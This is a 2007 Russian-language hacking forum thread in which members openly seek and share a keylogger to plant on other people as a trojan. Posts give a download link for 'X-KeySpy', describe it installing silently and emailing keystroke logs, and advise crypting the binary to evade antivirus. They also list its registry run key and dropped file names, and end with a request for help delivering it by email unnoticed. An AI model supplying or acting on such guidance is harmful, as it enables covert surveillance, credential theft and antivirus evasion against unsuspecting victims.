Кейлогер нужен

Discussion in 'Уязвимости Mail-сервисов' started by Benzin, 23 Jan 2007.

  1. Benzin

    Benzin Elder - Старейшина

    Joined:
    15 Jan 2007
    Messages:
    39
    Likes Received:
    8
    Reputations:
    -5
    Дайте плиз линк на хорошего кейлогера, только мыльного, типа как в пинче и хинче, но только чтоб работал.
    ___________
    Спасибо!
     
  2. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
  3. Benzin

    Benzin Elder - Старейшина

    Joined:
    15 Jan 2007
    Messages:
    39
    Likes Received:
    8
    Reputations:
    -5
    Я че то не понял как его юзать то, даже не врубился где ключ вводить... а то 10 дней всего, да и руссика на него че то не нашел...
     
  4. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    X-KeySpy v0.7
    _http://freeshells.ch/~hsi/xkeyspy.zip
    Очень приличный логгер. Имеет собственный smtp-сервер для отправки отчетов.
    P.S. После конфигурирования желательно закриптовать тело.
     
    1 person likes this.
  5. Robin_Hood

    Robin_Hood Elder - Старейшина

    Joined:
    30 Oct 2006
    Messages:
    144
    Likes Received:
    155
    Reputations:
    47
    http://www.actualspy.ru/
    http://www.z-oleg.com/secur/articles/keylogger.php
    http://worldcpp.vingrad.ru/vspp/zgrt117.php
    http://content.mail.ru/pages/p_1684.html
    http://www.izcity.com/lib/28042005.htm
    гуглим товарищ
     
    1 person likes this.
  6. Benzin

    Benzin Elder - Старейшина

    Joined:
    15 Jan 2007
    Messages:
    39
    Likes Received:
    8
    Reputations:
    -5
    Про актруал спай знаю, у самого стоит.., вы меня видимо не так поняли... мне нужно впарить кейлогер челу, как трояна, а потом просто словить лог на мыло или на хост, а эти вроде не по такому принцыпу работают..
    Или я ошибаюсь, поправьте если че..
     
  7. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    Benzin
    Ну вот xkeyspy по такому принципу и работает. После запуска незаметно устанавливается в системе и шлет логи на указанный при конфигурации email. Размер сжатого тела - 5 Кб.
     
  8. Benzin

    Benzin Elder - Старейшина

    Joined:
    15 Jan 2007
    Messages:
    39
    Likes Received:
    8
    Reputations:
    -5
    Пасиб, я уже понял после того как установил его.., я так понимаю впаривать надо сам keylogger. Я его себе запустил, где его искать теперь и как избавиться?
     
  9. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    Benzin
    Вот это я не помню.
    Проще всего тебе будет запустить AVP и удалить им, так как эта версия некриптованная и ее сигнатура есть в базе.
    Либо запустить еще раз и отследить манипуляции с ФС и реестром с помощью Regshot, File Monitor
     
    #9 hsi, 24 Jan 2007
    Last edited: 24 Jan 2007
  10. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    Расковырял я его.
    Логгер делает следующее:
    Пишет в реестр -
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svroot с параметром C:\WINDOWS\system32\svroot.exe
    Пишет в системную папку два файла:
    C:\WINDOWS\system32\svroot.dll
    C:\WINDOWS\system32\gorsys32.dll
    Чтобы избавиться от логгера достаточно удалить параметр из реестра и тело из системной папки.
     
  11. Benzin

    Benzin Elder - Старейшина

    Joined:
    15 Jan 2007
    Messages:
    39
    Likes Received:
    8
    Reputations:
    -5
    Ага, C:\WINDOWS\system32\svroot.dll , нашел сам, а вот этот C:\WINDOWS\system32\gorsys32.dll, только с твоей помощью.
    Блин никак не могу определиться какой размер на лог файл ставить.., ты сколько ставишь?
     
  12. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    Benzin
    Я нисколько, потому что впариванием не увлекаюсь. :)
    Поставь 1-2 Кб, этого достаточно, я думаю.
     
  13. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Блин нифига он нече неотправляет пробовал и на mail.ru и на gmail.com. Может у кого нить остался старенький АктуалСпай с кряком? А то я скачал последний нашел на него кряк активировал он сказал что все мол Ок а после перезагрузки компа пишит мол введите ключ.
     
  14. saggers

    saggers New Member

    Joined:
    21 Feb 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    X-KeySpy y АVG - натуральным Трояном кличется.

    Если нетрудно, опишите пожалуста новичку процесс впаривания этого (иль другого) кейлогера на комп через мыло. Как криптовать чтобы не подозрили, и т.д.


    У меня WINDOWS не русский, и конфигуратор X-KeySpy виден мне в вопросительных знаках. Помогите расшифровать эти 3 поля.